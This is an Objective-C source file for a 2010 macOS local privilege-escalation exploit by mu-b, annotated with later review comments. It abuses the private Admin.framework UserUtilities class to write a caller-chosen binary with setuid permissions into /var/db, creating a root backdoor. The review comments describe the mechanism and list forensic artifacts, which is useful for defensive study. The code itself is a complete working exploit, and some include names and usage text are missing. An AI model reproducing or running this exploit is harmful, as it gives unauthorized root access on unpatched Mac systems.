/* osx-irony-assist.m
 *
 * Copyright (c) 2010 by
 *
 * Apple MACOS X < 10.9/10? local root exploit
 * by mu-b - June 2010
 *
 * - Tested on: Apple MACOS X <= 10.8.X
 *
 * $Id: osx-irony-assist.m 17 2015-04-10 09:54:26Z mu-b $
 *
 * The most ironic backdoor perhaps in the history of backdoors.
 * Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
 * uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
 * in a directory,
 *
 * drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db
 *
 * without being root, now how did you do that?
 *
 * Copy what you want, wherever you want it, with whatever permissions you
 * desire, hmmm, backdoor?
 *
 * This is now fixed, so I guess this is OK :-)
 *
 * - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
 */

/*
 * NOTE(review): Historical proof-of-concept for a privilege-escalation bug
 * that the header says has been fixed (the banner names versions below 10.9
 * as affected). Mechanism as visible in this file: the process loads the
 * private Admin.framework, obtains an SFAuthorization, asks the framework's
 * Authenticator to authenticate with it, and then asks UserUtilities to
 * create a file at the destination path with caller-supplied contents and a
 * caller-chosen POSIX mode. Nothing here checks whether the authentication
 * step succeeded before the write is attempted, and the write's outcome is
 * not inspected either.
 *
 * From a defensive standpoint the observable artifacts are: a file created
 * at the destination path (default /var/db/.AccessibilityAPIEnabled) whose
 * requested mode 2377 (decimal; 04511 octal) includes the setuid bit, a
 * non-root process loading Admin.framework, and the
 * "com.apple.accessibility.api" distributed notification posted at the end.
 *
 * Extraction damage in this copy: the four include/import directives below
 * have lost their header names, the "by:" line of main()'s banner has lost
 * the author contact, and the usage string appears to have lost its source
 * argument placeholder -- presumably angle-bracketed text stripped as markup.
 */

#include    /* header name lost in extraction */
#include    /* header name lost in extraction */
#import     /* header name lost in extraction */
#import     /* header name lost in extraction */

/* where you want to write it! */
#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"

/*
 * Copy the bytes of the file at spath to dpath via Admin.framework's
 * UserUtilities, requesting POSIX mode 2377 (decimal; 04511 octal, i.e.
 * setuid bit plus r-x--x--x).
 *
 * spath: path of the file whose contents are read with NSData.
 * dpath: destination path handed to createFileWithContents:path:attributes:.
 *
 * Returns EXIT_FAILURE when a private class or the source file cannot be
 * loaded, EXIT_SUCCESS otherwise -- the write itself is never checked, so
 * EXIT_SUCCESS does not mean the file was actually created.
 */
int do_assistive_copy(const char *spath, const char *dpath)
{
    /* Manual retain/release style. The pool is created but never drained
     * or released, so everything autoreleased below lives until exit. */
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    /* NOTE(review): userUtilsInstance is declared as id* (pointer to id),
     * not id; see the cast at the alloc and the *userUtilsInstance
     * dereference further down. */
    id authenticatorInstance, *userUtilsInstance;
    Class authenticatorClass, userUtilsClass;

    printf ("%s %s\n", spath, dpath);
    (void) pool;    /* only silences the unused-variable warning */

    /* Private framework: none of these classes or selectors come from a
     * public header, hence the performSelector: calls and the pragma below. */
    NSBundle *adminBundle = [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
    authenticatorClass = [adminBundle classNamed:@"Authenticator"];
    if (!authenticatorClass) {
        fprintf (stderr, "* failed locating the Authenticator Class\n");
        return (EXIT_FAILURE);
    }
    printf ("* Found Authenticator Class!\n");
    authenticatorInstance = [authenticatorClass performSelector:@selector(sharedAuthenticator)];

    userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
    if (!userUtilsClass) {
        fprintf (stderr, "* failed locating the UserUtilities Class\n");
        return (EXIT_FAILURE);
    }
    printf ("* found UserUtilities Class!\n");
    /* alloc without init, cast to id*: the later *userUtilsInstance reads
     * the first pointer-sized word of the raw object (its isa under the
     * Objective-C runtime), so the createFileWithContents: message
     * presumably goes to the class rather than to an initialized instance --
     * TODO confirm against the framework. This aliasing is why a
     * behaviour-preserving rewrite of the function is not safe. */
    userUtilsInstance = (id *) [userUtilsClass alloc];

    SFAuthorization *authObj = [SFAuthorization authorization];
    /* performSelector:withObject: returns id; the cast to OSStatus
     * reinterprets whatever the selector returned. The value is printed but
     * never tested, so the copy below is attempted regardless of outcome. */
    OSStatus isAuthed = (OSStatus) [authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:) withObject:authObj];
    printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);

    /* spath is decoded as ASCII; a path with bytes outside that encoding can
     * yield a nil NSString and therefore nil data here. */
    NSData *suidBin = [NSData dataWithContentsOfFile:[NSString stringWithCString:spath encoding:NSASCIIStringEncoding]];
    if (!suidBin) {
        fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
        return (EXIT_FAILURE);
    }

    /* 2377 is a decimal literal: 04511 octal = setuid bit + r-x--x--x. */
    NSDictionary *createFileWithContentsDict = [NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377] forKey:(id)NSFilePosixPermissions];
    if (!createFileWithContentsDict) {
        fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
        return (EXIT_FAILURE);
    }

    /* Create-rule CF object that is never CFRelease'd (a leak, harmless for
     * a one-shot tool). dpath is decoded as MacRoman, not UTF-8. */
    CFStringRef writePath = CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);

    /* The selector is not declared in any visible header; the pragma only
     * silences the resulting compiler warning. No return value is inspected,
     * so a refused write is indistinguishable from success at this point. */
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
    [*userUtilsInstance createFileWithContents:suidBin path:writePath attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
    printf ("* now execute suid backdoor at %s\n", dpath);

    /* send the "Distributed Object Message" to the defaultCenter,
     * is this really necessary? (not for ownage) */
    [[NSDistributedNotificationCenter defaultCenter] postNotificationName:@"com.apple.accessibility.api" object:@"system.preferences" userInfo:nil deliverImmediately:YES];

    return (EXIT_SUCCESS);
}

/*
 * Entry point. argv[1] is the source file; argv[2], when present, overrides
 * the default destination BACKDOOR_BIN. With no arguments the usage line is
 * printed to stderr and the process exits with EXIT_SUCCESS.
 */
int main (int argc, const char * argv[])
{
    /* NOTE(review): the "by: " line lost its contact text in extraction. */
    printf ("Apple MACOS X < 10.9/10? local root exploit\n"
            "by: \n"
            "http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");

    if (argc <= 1) {
        /* NOTE(review): the mandatory source-path placeholder appears to be
         * missing from this string (presumably stripped in extraction). */
        fprintf (stderr, "Usage: %s [destination]\n", argv[0]);
        exit (EXIT_SUCCESS);
    }

    return (do_assistive_copy(argv[1], argc > 2 ? argv[2] : BACKDOOR_BIN));
}